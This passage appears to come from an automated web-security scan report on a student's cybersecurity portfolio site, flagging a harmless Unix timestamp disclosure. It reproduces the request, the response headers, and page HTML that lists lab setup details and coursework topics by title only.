          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
           <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          16894306
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        18. GET https://beekmans.dev/
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          2000000000, which evaluates to: 2033-05-18 05:33:20

          Request
          Request line and header section (224 bytes)
          GET https://beekmans.dev/ HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1039 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:13 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O9CfHQgObVNEaGCeR54qKKwytECMmlM5H0bXWDqJpVGo4vNUT18M2ld9NoeIDxTsPe1bzHv%2F9eh3xB7p6KNQNXYdikH5v2vQoVZ4Lqr2%2BgmRM8bXQ1W95L9VnzmijHE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a326098f0c09-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178339 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
           <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
           <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
